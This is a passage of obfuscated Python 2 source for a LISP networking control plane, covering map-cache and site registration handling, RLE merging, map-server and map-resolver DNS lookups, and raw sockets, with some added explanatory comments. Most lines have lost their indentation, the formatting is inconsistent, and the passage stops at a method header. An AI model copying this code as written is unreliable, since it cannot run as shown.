if ( I1IIiIIIii . rle_name and I1IIiIIIii . rle == None ) :
if ( lisp_rle_list . has_key ( I1IIiIIIii . rle_name ) ) :
I1IIiIIIii . rle = lisp_rle_list [ I1IIiIIIii . rle_name ]
if ( I1IIiIIIii . rle ) : return ( [ None , None , None , None , I1IIiIIIii . rle , None ] )
if ( I1IIiIIIii . elp and I1IIiIIIii . elp . use_elp_node ) :
return ( [ I1IIiIIIii . elp . use_elp_node . address , None , None , None , None ,
None ] )
Iii1111IIiI1 = None if ( I1IIiIIIii . rloc . is_null ( ) ) else I1IIiIIIii . rloc
Oo0O00O = I1IIiIIIii . translated_port
I11I1iI = self . action if ( Iii1111IIiI1 == None ) else None
Iii11I = None
if ( ii1 and ii1 . request_nonce_timeout ( ) == False ) :
Iii11I = ii1 . get_request_or_echo_nonce ( ipc_socket , Iii1111IIiI1 )
return ( [ Iii1111IIiI1 , Oo0O00O , Iii11I , I11I1iI , None , I1IIiIIIii ] )
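#
# Note (added): judging from the return statements above, this routine
# yields a 6-tuple [dest-rloc, translated-port, nonce, negative-action,
# rle, best-rloc-entry]; each return path fills in only the positions
# that apply to it.
#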
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
for i1III111 in self . rloc_set :
for I1IIiIIIii in rloc_address_set :
if ( I1IIiIIIii . is_exact_match ( i1III111 . rloc ) == False ) : continue
I1IIiIIIii = None
break
if ( I1IIiIIIii == rloc_address_set [ - 1 ] ) : return ( False )
return ( True )
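#
# Note (added): the inner loop above clears its loop variable and breaks
# when a match is found, so after the loop the variable still equals the
# last element of rloc_address_set only if nothing matched; that is what
# the final comparison tests.
#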
def get_rloc ( self , rloc ) :
for i1III111 in self . rloc_set :
O0OOOO0o0O = i1III111 . rloc
if ( rloc . is_exact_match ( O0OOOO0o0O ) ) : return ( i1III111 )
return ( None )
def get_rloc_by_interface ( self , interface ) :
for i1III111 in self . rloc_set :
if ( i1III111 . interface == interface ) : return ( i1III111 )
return ( None )
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( ooOOo0ooo == None ) :
ooOOo0ooo = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , ooOOo0ooo )
ooOOo0ooo . add_source_entry ( self )
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
o0o000Oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0o000Oo == None ) :
o0o000Oo = lisp_mapping ( self . group , self . group , [ ] )
o0o000Oo . eid . copy_address ( self . group )
o0o000Oo . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , o0o000Oo )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0o000Oo . group )
o0o000Oo . add_source_entry ( self )
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
IIII1 = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( IIII1 ) )
else :
o0o000Oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( o0o000Oo == None ) : return
I1iiI1iI1 = o0o000Oo . lookup_source_cache ( self . eid , True )
if ( I1iiI1iI1 == None ) : return
o0o000Oo . source_cache . delete_cache ( self . eid )
if ( o0o000Oo . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
o0OoO0000o = "," + str ( self . secondary_iid )
return ( prefix . replace ( o0OoO0000o , o0OoO0000o + "*" ) )
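#
# Note (added, hypothetical value): with secondary_iid 2000, a prefix
# string containing ",2000" is returned as ",2000*", marking the
# secondary instance-ID with an asterisk.
#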
 def increment_decap_stats ( self , packet ) :
  Oo0O00O = packet . udp_dport
  if ( Oo0O00O == LISP_DATA_PORT ) :
   I1IIiIIIii = self . get_rloc ( packet . outer_dest )
  else :
   #
   # Not the data-port: charge the first RLOC that has a translated
   # port (or the last RLOC when none does). Start at None so an empty
   # rloc-set cannot leave the variable unbound below.
   #
   I1IIiIIIii = None
   for I1IIiIIIii in self . rloc_set :
    if ( I1IIiIIIii . translated_port != 0 ) : break

  if ( I1IIiIIIii != None ) : I1IIiIIIii . stats . increment ( len ( packet . packet ) )
  self . stats . increment ( len ( packet . packet ) )
def rtrs_in_rloc_set ( self ) :
for I1IIiIIIii in self . rloc_set :
if ( I1IIiIIIii . is_rtr ( ) ) : return ( True )
return ( False )
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
class lisp_dynamic_eid ( ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
def get_timeout ( self , interface ) :
try :
o0o0OoOO0O0 = lisp_myinterfaces [ interface ]
self . timeout = o0o0OoOO0O0 . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
class lisp_group_mapping ( ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
def lisp_is_group_more_specific ( group_str , group_mapping ) :
o0OoO0000o = group_mapping . group_prefix . instance_id
OO00O = group_mapping . group_prefix . mask_len
IIi1iiIII11 = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , o0OoO0000o )
if ( IIi1iiIII11 . is_more_specific ( group_mapping . group_prefix ) ) : return ( OO00O )
return ( - 1 )
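#
# Note (added): the function returns the configured group-prefix
# mask-length on a match so callers can prefer the longest prefix, or -1
# when the group does not fall inside the prefix. For example, a lookup
# of "224.1.1.1" against a group-prefix of 224.0.0.0/4 would return 4.
#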
def lisp_lookup_group ( group ) :
oOOO000 = None
for O0OoOooO0O00o in lisp_group_mapping_list . values ( ) :
OO00O = lisp_is_group_more_specific ( group , O0OoOooO0O00o )
if ( OO00O == - 1 ) : continue
if ( oOOO000 == None or OO00O > oOOO000 . group_prefix . mask_len ) : oOOO000 = O0OoOooO0O00o
return ( oOOO000 )
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
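#
# Note (added): each description carries a "{}" placeholder that
# lisp_site_eid.print_flags() below fills with "" or "not ", depending
# on whether the flag letter is upper- or lower-case.
#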
class lisp_site ( ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
class lisp_site_eid ( ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_flags ( self , html ) :
if ( html == False ) :
Oo0Ooo0O0 = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
Ooo0OO0O0oO = self . print_flags ( False )
Ooo0OO0O0oO = Ooo0OO0O0oO . split ( "-" )
Oo0Ooo0O0 = ""
for OO00OOoo in Ooo0OO0O0oO :
I1I1i1IIII1 = lisp_site_flags [ OO00OOoo . upper ( ) ]
I1I1i1IIII1 = I1I1i1IIII1 . format ( "" if OO00OOoo . isupper ( ) else "not " )
Oo0Ooo0O0 += lisp_span ( OO00OOoo , I1I1i1IIII1 )
if ( OO00OOoo . lower ( ) != "n" ) : Oo0Ooo0O0 += "-"
return ( Oo0Ooo0O0 )
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
def build_sort_key ( self ) :
OoOooO00 = lisp_cache ( )
OOoOOO , Oo000O000 = OoOooO00 . build_key ( self . eid )
ooOOOo = ""
if ( self . group . is_null ( ) == False ) :
iiiIiII , ooOOOo = OoOooO00 . build_key ( self . group )
ooOOOo = "-" + ooOOOo [ 0 : 12 ] + "-" + str ( iiiIiII ) + "-" + ooOOOo [ 12 : : ]
Oo000O000 = Oo000O000 [ 0 : 12 ] + "-" + str ( OOoOOO ) + "-" + Oo000O000 [ 12 : : ] + ooOOOo
del ( OoOooO00 )
return ( Oo000O000 )
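#
# Note (added, assumption): splicing the mask-length into the cache key
# makes lexicographic ordering follow prefix-length, so sorted listings
# of site entries appear to group more-specific prefixes after their
# covering prefixes.
#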
def merge_in_site_eid ( self , child ) :
Ii1I1i1I1 = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
Ii1I1i1I1 = self . merge_rles_in_site_eid ( )
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
return ( Ii1I1i1I1 )
def copy_rloc_records ( self ) :
o00o0 = [ ]
for i1III111 in self . registered_rlocs :
o00o0 . append ( copy . deepcopy ( i1III111 ) )
return ( o00o0 )
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for o0o000 in self . individual_registrations . values ( ) :
if ( self . site_id != o0o000 . site_id ) : continue
if ( o0o000 . registered == False ) : continue
self . registered_rlocs += o0o000 . copy_rloc_records ( )
o00o0 = [ ]
for i1III111 in self . registered_rlocs :
if ( i1III111 . rloc . is_null ( ) or len ( o00o0 ) == 0 ) :
o00o0 . append ( i1III111 )
continue
for o0OOooOooo in o00o0 :
if ( o0OOooOooo . rloc . is_null ( ) ) : continue
if ( i1III111 . rloc . is_exact_match ( o0OOooOooo . rloc ) ) : break
if ( o0OOooOooo == o00o0 [ - 1 ] ) : o00o0 . append ( i1III111 )
self . registered_rlocs = o00o0
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
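#
# Note (added): the rebuild above drops duplicate RLOC addresses from
# the merged list while keeping unaddressed (null) RLOC records; the
# comparison against the list's last element is the "no duplicate
# found" test.
#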
def merge_rles_in_site_eid ( self ) :
I1i11111Iiii = { }
for i1III111 in self . registered_rlocs :
if ( i1III111 . rle == None ) : continue
for Iii in i1III111 . rle . rle_nodes :
IiiIIi1 = Iii . address . print_address_no_iid ( )
I1i11111Iiii [ IiiIIi1 ] = Iii . address
break
self . merge_rlocs_in_site_eid ( )
Ooooo000 = [ ]
for i1III111 in self . registered_rlocs :
if ( self . registered_rlocs . index ( i1III111 ) == 0 ) :
Ooooo000 . append ( i1III111 )
continue
if ( i1III111 . rle == None ) : Ooooo000 . append ( i1III111 )
self . registered_rlocs = Ooooo000
iI1Ii11 = lisp_rle ( "" )
o0000OoooO0Oo = { }
oo0O0OOooO0 = None
for o0o000 in self . individual_registrations . values ( ) :
if ( o0o000 . registered == False ) : continue
I1i1i1IiI = o0o000 . registered_rlocs [ 0 ] . rle
if ( I1i1i1IiI == None ) : continue
oo0O0OOooO0 = o0o000 . registered_rlocs [ 0 ] . rloc_name
for O0o0O00 in I1i1i1IiI . rle_nodes :
IiiIIi1 = O0o0O00 . address . print_address_no_iid ( )
if ( o0000OoooO0Oo . has_key ( IiiIIi1 ) ) : break
Iii = lisp_rle_node ( )
Iii . address . copy_address ( O0o0O00 . address )
Iii . level = O0o0O00 . level
Iii . rloc_name = oo0O0OOooO0
iI1Ii11 . rle_nodes . append ( Iii )
o0000OoooO0Oo [ IiiIIi1 ] = O0o0O00 . address
if ( len ( iI1Ii11 . rle_nodes ) == 0 ) : iI1Ii11 = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = iI1Ii11
if ( oo0O0OOooO0 ) : self . registered_rlocs [ 0 ] . rloc_name = None
if ( I1i11111Iiii . keys ( ) == o0000OoooO0Oo . keys ( ) ) : return ( False )
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
I1i11111Iiii . keys ( ) , o0000OoooO0Oo . keys ( ) ) )
return ( True )
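#
# Note (added): a True return reports that the merged RLE node set
# changed with this registration, as logged just above; False means the
# old and new RLE node sets are identical.
#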
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) :
iIiIi1I = lisp_site_eid ( self . site )
iIiIi1I . eid . copy_address ( self . group )
iIiIi1I . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , iIiIi1I )
iIiIi1I . parent_for_more_specifics = self . parent_for_more_specifics
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iIiIi1I . group )
iIiIi1I . add_source_entry ( self )
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
iIiIi1I = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( iIiIi1I == None ) : return
o0o000 = iIiIi1I . lookup_source_cache ( self . eid , True )
if ( o0o000 == None ) : return
if ( iIiIi1I . source_cache == None ) : return
iIiIi1I . source_cache . delete_cache ( self . eid )
if ( iIiIi1I . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
def inherit_from_ams_parent ( self ) :
O0Ii1IiiiI = self . parent_for_more_specifics
if ( O0Ii1IiiiI == None ) : return
self . force_proxy_reply = O0Ii1IiiiI . force_proxy_reply
self . force_nat_proxy_reply = O0Ii1IiiiI . force_nat_proxy_reply
self . force_ttl = O0Ii1IiiiI . force_ttl
self . pitr_proxy_reply_drop = O0Ii1IiiiI . pitr_proxy_reply_drop
self . proxy_reply_action = O0Ii1IiiiI . proxy_reply_action
self . echo_nonce_capable = O0Ii1IiiiI . echo_nonce_capable
self . policy = O0Ii1IiiiI . policy
self . require_signature = O0Ii1IiiiI . require_signature
self . encrypt_json = O0Ii1IiiiI . encrypt_json
def rtrs_in_rloc_set ( self ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . is_rtr ( ) ) : return ( True )
return ( False )
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( i1III111 . is_rtr ( ) ) : return ( True )
return ( False )
def is_rloc_in_rloc_set ( self , rloc ) :
for i1III111 in self . registered_rlocs :
if ( i1III111 . rle ) :
for iI1Ii11 in i1III111 . rle . rle_nodes :
if ( iI1Ii11 . address . is_exact_match ( rloc ) ) : return ( True )
if ( i1III111 . rloc . is_exact_match ( rloc ) ) : return ( True )
return ( False )
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
for i1III111 in prev_rloc_set :
OoOO0O = i1III111 . rloc
if ( self . is_rloc_in_rloc_set ( OoOO0O ) == False ) : return ( False )
return ( True )
class lisp_mr ( ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oOOooOooO = IIiiI [ 2 ]
except :
return
if ( len ( oOOooOooO ) <= self . a_record_index ) :
self . delete_mr ( )
return
IiiIIi1 = oOOooOooO [ self . a_record_index ]
if ( IiiIIi1 != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( IiiIIi1 )
self . insert_mr ( )
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
for IiiIIi1 in oOOooOooO [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
I1I1iiii111II = lisp_get_map_resolver ( OO0o , None )
if ( I1I1iiii111II != None and I1I1iiii111II . a_record_index == oOOooOooO . index ( IiiIIi1 ) ) :
continue
I1I1iiii111II = lisp_mr ( IiiIIi1 , None , None )
I1I1iiii111II . a_record_index = oOOooOooO . index ( IiiIIi1 )
I1I1iiii111II . dns_name = self . dns_name
I1I1iiii111II . last_dns_resolve = lisp_get_timestamp ( )
oOoOOoo0OoO = [ ]
for I1I1iiii111II in lisp_map_resolvers_list . values ( ) :
if ( self . dns_name != I1I1iiii111II . dns_name ) : continue
OO0o = I1I1iiii111II . map_resolver . print_address_no_iid ( )
if ( OO0o in oOOooOooO ) : continue
oOoOOoo0OoO . append ( I1I1iiii111II )
for I1I1iiii111II in oOoOOoo0OoO : I1I1iiii111II . delete_mr ( )
def insert_mr ( self ) :
Oo000O000 = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ Oo000O000 ] = self
def delete_mr ( self ) :
Oo000O000 = self . mr_name + self . map_resolver . print_address ( )
if ( lisp_map_resolvers_list . has_key ( Oo000O000 ) == False ) : return
lisp_map_resolvers_list . pop ( Oo000O000 )
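#
# Note (added): dict.has_key(), used here and throughout this module,
# exists only in Python 2; the Python 3 spelling of the same test is
# "key in dict".
#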
class lisp_ddt_root ( ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
class lisp_referral ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
def print_referral ( self , eid_indent , referral_indent ) :
o00OO0OoOOO = lisp_print_elapsed ( self . uptime )
ooooO0oOo0O = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , o00OO0OoOOO ,
ooooO0oOo0O , len ( self . referral_set ) ) )
for iiI111I in self . referral_set . values ( ) :
iiI111I . print_ref_node ( referral_indent )
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
return ( lisp_map_referral_action_string [ self . referral_type ] )
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def print_ttl ( self ) :
oOoooOOO0o0 = self . referral_ttl
if ( oOoooOOO0o0 < 60 ) : return ( str ( oOoooOOO0o0 ) + " secs" )
if ( ( oOoooOOO0o0 % 60 ) == 0 ) :
oOoooOOO0o0 = str ( oOoooOOO0o0 / 60 ) + " mins"
else :
oOoooOOO0o0 = str ( oOoooOOO0o0 ) + " secs"
return ( oOoooOOO0o0 )
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
LISP_DDT_ACTION_NOT_AUTH ) )
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) :
IiII111IiII1 = lisp_referral ( )
IiII111IiII1 . eid . copy_address ( self . group )
IiII111IiII1 . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , IiII111IiII1 )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( IiII111IiII1 . group )
IiII111IiII1 . add_source_entry ( self )
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
IiII111IiII1 = lisp_referral_cache . lookup_cache ( self . group , True )
if ( IiII111IiII1 == None ) : return
iiIIII = IiII111IiII1 . lookup_source_cache ( self . eid , True )
if ( iiIIII == None ) : return
IiII111IiII1 . source_cache . delete_cache ( self . eid )
if ( IiII111IiII1 . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
class lisp_referral_node ( ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
def print_ref_node ( self , indent ) :
i1 = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , i1 ,
"up" if self . updown else "down" , self . priority , self . weight ) )
class lisp_ms ( ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = lisp_map_servers_list . values ( ) [ 0 ] . xtr_id
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
try :
IIiiI = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
oOOooOooO = IIiiI [ 2 ]
except :
return
if ( len ( oOOooOooO ) <= self . a_record_index ) :
self . delete_ms ( )
return
IiiIIi1 = oOOooOooO [ self . a_record_index ]
if ( IiiIIi1 != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( IiiIIi1 )
self . insert_ms ( )
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
for IiiIIi1 in oOOooOooO [ 1 : : ] :
OO0o = lisp_address ( LISP_AFI_NONE , IiiIIi1 , 0 , 0 )
ii1iOo = lisp_get_map_server ( OO0o )
if ( ii1iOo != None and ii1iOo . a_record_index == oOOooOooO . index ( IiiIIi1 ) ) :
continue
ii1iOo = copy . deepcopy ( self )
ii1iOo . map_server . store_address ( IiiIIi1 )
ii1iOo . a_record_index = oOOooOooO . index ( IiiIIi1 )
ii1iOo . last_dns_resolve = lisp_get_timestamp ( )
ii1iOo . insert_ms ( )
oOoOOoo0OoO = [ ]
for ii1iOo in lisp_map_servers_list . values ( ) :
if ( self . dns_name != ii1iOo . dns_name ) : continue
OO0o = ii1iOo . map_server . print_address_no_iid ( )
if ( OO0o in oOOooOooO ) : continue
oOoOOoo0OoO . append ( ii1iOo )
for ii1iOo in oOoOOoo0OoO : ii1iOo . delete_ms ( )
def insert_ms ( self ) :
Oo000O000 = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ Oo000O000 ] = self
def delete_ms ( self ) :
Oo000O000 = self . ms_name + self . map_server . print_address ( )
if ( lisp_map_servers_list . has_key ( Oo000O000 ) == False ) : return
lisp_map_servers_list . pop ( Oo000O000 )
class lisp_interface ( ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
def get_instance_id ( self ) :
return ( self . instance_id )
def get_socket ( self ) :
return ( self . raw_socket )
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
def set_socket ( self , device ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
IiII1iiI . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
IiII1iiI . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
IiII1iiI . close ( )
IiII1iiI = None
self . raw_socket = IiII1iiI
 def set_bridge_socket ( self , device ) :
  IiII1iiI = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
  try :
   #
   # socket.bind() returns None, so keep the socket object itself
   # rather than assigning from the bind() return value.
   #
   IiII1iiI . bind ( ( device , 0 ) )
   self . bridge_socket = IiII1iiI
  except :
   return
class lisp_datetime ( ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
 def valid_datetime ( self ) :
